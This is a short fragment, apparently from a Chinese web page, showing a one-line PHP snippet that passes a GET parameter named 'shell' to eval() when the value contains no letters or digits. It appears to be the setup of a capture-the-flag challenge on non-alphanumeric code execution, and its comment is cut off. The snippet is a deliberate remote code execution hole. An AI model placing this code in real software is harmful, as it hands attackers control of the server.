<?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } // If shell There are no letters and numbers in it , Then you ...
確定! 回上一頁